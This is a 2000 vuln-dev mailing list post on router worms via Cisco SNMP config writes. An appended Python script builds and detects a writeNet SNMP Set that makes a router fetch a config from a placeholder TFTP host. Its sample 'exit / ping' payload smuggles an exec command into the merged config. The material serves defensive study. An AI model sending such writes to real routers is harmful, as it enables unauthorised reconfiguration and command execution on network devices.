Vulnerability Development mailing list archives

Re: Router worm exploiting poor SNMP security.


From: Lincoln Yeoh <lyeoh () POP JARING MY>
Date: Fri, 15 Dec 2000 11:24:05 +0800

> Can you execute scripts on routers via SNMP writes? I thought this required
> console access. Also, can you upload files via SNMP writes? I would be very
> surprised if you could....
>
> The only way I could think of doing it is placing the payload in the
> configuration 'script' and reconfiguring via SNMP, then rebooting, forcing a
> reconfigure via TFTP or whatever; this may be noticed.
>
> I don't know whether this would work, i.e., how powerful the configuration
> 'script' can be.


I've mentioned something like this on this list before (
http://www.securityfocus.com/templates/archive.pike?list=82&mid=139708 )

Some years back I learnt that when you send a configuration to Cisco
routers by SNMP you are actually merging the config (not sure if this is
still true with current IOS, go check it out yourself). You are not
overwriting the config.

So I theorized that the SNMP config was just like doing a config term, only
via SNMP.

And I confirmed it when I created a "config" that went like this:

exit
ping A.B.C.D

Then the router would ping A.B.C.D.
--
The important bits I see for worm writing on Cisco routers are:

1) If you can SNMP write the config, you can execute arbitrary commands.
Not a big deal in itself.

2) Writing the config by SNMP is just merging not totally wiping and
overwriting an existing config (this may have changed, but the method could
still exist). This means you can just change small bits of the config
without screwing up the entire router (and likely the network your worm is
on).

3) Cisco routers can behave as TFTP servers, and can store multiple images.

So worm writing looks possible, not easy but possible.

However router admins can easily filter SNMP and TFTP packets so that only
certain IPs can do SNMP/TFTP with their routers.

So just secure your routers properly and you should have no worm problem.

Cheerio,
Link.
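Added example, not part of Link's post or of any Cisco code: the SNMP write he describes is a Set on the OLD-CISCO-SYS-MIB object writeNet (.1.3.6.1.4.1.9.2.1.55.<tftp-server-ip>), whose value is the filename the router then fetches over TFTP and merges into the running config. The script below hand-encodes that SNMPv1 SetRequest in BER, decodes it again, and doubles as the "this may be noticed" check: a function that flags a UDP/161 payload as a writeNet Set so it can be matched in a packet capture. The community string, TFTP server 192.0.2.20, filename and the "exit / ping" merge payload are constructed sample values.

```python
"""SNMPv1 SetRequest on Cisco writeNet: encoder, decoder and detector.

Added example for the vuln-dev thread; assumed sample values only.
writeNet is .1.3.6.1.4.1.9.2.1.55.A.B.C.D where A.B.C.D is the TFTP server
the router will pull the file from; the Set value is the filename.
"""
import ipaddress

WRITENET_PREFIX = (1, 3, 6, 1, 4, 1, 9, 2, 1, 55)
SETREQUEST_TAG = 0xA3          # context tag [3] in the SNMP PDU choice
GETREQUEST_TAG = 0xA0

# Constructed merge payload in the spirit of the post: "exit" leaves config
# mode, so the next line runs as an exec command when the file is merged.
MERGE_CONFIG = "exit\nping 192.0.2.10\n"


def ber_length(n: int) -> bytes:
    """Short form under 128, long form (0x8N + N length bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(body)) + body


def ber_int(v: int) -> bytes:
    """Non-negative INTEGER, minimal big-endian with a 0x00 pad if the top bit is set."""
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return ber_tlv(0x02, body)


def ber_oid(arcs) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunks = [a & 0x7F]
        a >>= 7
        while a:
            chunks.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunks))
    return ber_tlv(0x06, bytes(out))


def writenet_oid(tftp_server: str):
    """writeNet instance OID: prefix + the four octets of the TFTP server address."""
    return WRITENET_PREFIX + tuple(ipaddress.IPv4Address(tftp_server).packed)


def build_request(community: str, varbinds, request_id=1, pdu_tag=SETREQUEST_TAG) -> bytes:
    """SNMPv1 message: SEQUENCE { version 0, community, PDU { id, 0, 0, varbinds } }.
    Each varbind is (oid_arcs, value_bytes); value None encodes NULL (for Get)."""
    vbl = b"".join(
        ber_tlv(0x30, ber_oid(oid) + (ber_tlv(0x04, val) if val is not None else b"\x05\x00"))
        for oid, val in varbinds)
    pdu = ber_tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + ber_tlv(0x30, vbl))
    return ber_tlv(0x30, ber_int(0) + ber_tlv(0x04, community.encode()) + pdu)


def build_writenet_set(community: str, tftp_server: str, filename: str, request_id=1) -> bytes:
    return build_request(community, [(writenet_oid(tftp_server), filename.encode())], request_id)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, position after this TLV)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + ln], pos + ln


def _decode_oid(body: bytes):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return tuple(arcs)


def parse_writenet_set(payload: bytes):
    """Detection helper for a UDP/161 payload.
    Returns (community, tftp_server, filename) if it is a v1/v2c SetRequest
    carrying a writeNet varbind, else None."""
    try:
        tag, msg, _ = _read_tlv(payload, 0)
        if tag != 0x30:
            return None
        tag, ver, pos = _read_tlv(msg, 0)
        if tag != 0x02 or int.from_bytes(ver, "big") not in (0, 1):
            return None
        _, community, pos = _read_tlv(msg, pos)
        tag, pdu, _ = _read_tlv(msg, pos)
        if tag != SETREQUEST_TAG:
            return None
        pos = 0
        for _ in range(3):                 # request-id, error-status, error-index
            _, _, pos = _read_tlv(pdu, pos)
        _, vbl, _ = _read_tlv(pdu, pos)
        pos = 0
        while pos < len(vbl):
            _, vb, pos = _read_tlv(vbl, pos)
            tag, oid, vpos = _read_tlv(vb, 0)
            arcs = _decode_oid(oid) if tag == 0x06 else ()
            if len(arcs) == 14 and arcs[:10] == WRITENET_PREFIX:
                _, value, _ = _read_tlv(vb, vpos)
                return (community.decode(errors="replace"),
                        ".".join(map(str, arcs[10:])), value.decode(errors="replace"))
    except IndexError:                     # truncated or malformed packet
        return None
    return None


if __name__ == "__main__":
    pkt = build_writenet_set("private", "192.0.2.20", "merge.cfg", request_id=7)
    print(pkt.hex())
    print(parse_writenet_set(pkt))
```

Feeding the encoder's output to a capture filter (or running parse_writenet_set over the UDP/161 payloads in a pcap) is the cheap way to spot the write the post talks about; the fix on the router side is the one he names, a read/write community bound to an access list so only the management hosts can reach it.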

